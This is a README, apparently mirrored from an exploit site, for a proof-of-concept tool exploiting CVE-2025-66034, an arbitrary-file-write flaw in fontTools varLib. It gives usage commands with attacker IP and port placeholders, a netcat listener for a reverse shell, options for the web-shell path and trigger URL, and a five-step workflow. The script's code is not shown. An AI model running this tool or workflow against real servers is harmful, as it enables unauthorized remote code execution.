## https://sploitus.com/exploit?id=9A353868-7423-5B9C-86C4-87ABDF2D662A
# fontTools varLib CVE-2025-66034 Exploit
<p align="center">
<img alt="cve" src="https://img.shields.io/badge/CVE-2025--66034-critical">
<img alt="component" src="https://img.shields.io/badge/component-fontTools%20varLib-orange">
<img alt="vulnerability" src="https://img.shields.io/badge/vulnerability-Arbitrary%20File%20Write-red">
<img alt="vector" src="https://img.shields.io/badge/vector-.designspace%20Payload-yellow">
<img alt="impact" src="https://img.shields.io/badge/impact-Remote%20Code%20Execution-critical">
<img alt="language" src="https://img.shields.io/badge/language-Python-blue">
<img alt="dependency" src="https://img.shields.io/badge/dependency-fontTools-lightgrey">
<img alt="license" src="https://img.shields.io/badge/license-MIT-green">
</p>
This repo doesn't introduce a new vulnerability.
This is a Proof-of-concept exploit for **CVE-2025-66034** affecting the fontTools varLib variable font generation pipeline.
The vulnerability allows attackers to control the output filename inside a crafted `.designspace` file. When processed by a vulnerable font generation service, this can lead to arbitrary file write on the server filesystem.
The script **`varlib_cve_2025_66034.py`** automates payload creation, font generation, upload, and optional shell triggering.
---
## Features
- Automatic creation of compatible master fonts using fontTools
- Randomized shell filename generation
- Customizable target path and upload endpoint
- Automatic `nc` listener
- No manual font preparation required
---
## Requirements
Python **3.9+**
Install dependencies:
```bash
pip install fonttools requests
```
Netcat is required for the listener:
---
## Usage
**If your target is a self-hosted lab running on mysite.com, and the upload path, filesystem write path, and web-accessible trigger path match the defaults in the script, you can run it directly.**
Basic usage:
```bash
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>
```
**Highly likely the target uses different URLs or filesystem paths, override the defaults with the available options below, such as --url, --path, and --trigger or modify script manually**
**Note:** the multipart upload form names may vary depending on the environment. If the target does not use the same form field names as the script, adjust them in the `files` section before running the exploit.
## Options
| Argument | Description |
|--------|--------|
| `--ip` | Attacker listener IP |
| `--port` | Listener port |
| `--path` | Target filesystem path where the file will be written (must be web-accessible to trigger a web shell) |
| `--url` | Upload endpoint, form may vary |
| `--trigger` | Base URL used to trigger the written payload after upload |
| `--no-listen` | Disable automatic netcat listener |
Example with custom options:
```bash
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com
```
---
## Exploit Workflow
1. Generate compatible master fonts
2. Create malicious `.designspace` file
3. Upload payload via multipart POST
4. Write arbitrary file on the server
5. Trigger the payload via HTTP request
---
## Credits / Acknowledgements
Special thanks and respect to:
- The fontTools project maintainers and contributors for their work on the open-source fontTools library.
- The security researchers who discovered and responsibly disclosed **CVE-2025-66034**.
- The open-source security community for documenting and analyzing vulnerabilities that help improve software security.
This proof-of-concept is provided for educational and research purposes to help understand the vulnerability and its impact.
---
## Disclaimer
This code is provided **for educational and research purposes only**.
Do not use this exploit against systems you do not own or have explicit permission to test.
The author is not responsible for misuse or damage caused by this software.
---
## References
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
- GitHub Advisory: https://github.com/advisories/GHSA-768j-98cg-p3fv
- fontTools Project: https://github.com/fonttools/fonttools
- fontTools Documentation: https://fonttools.readthedocs.io/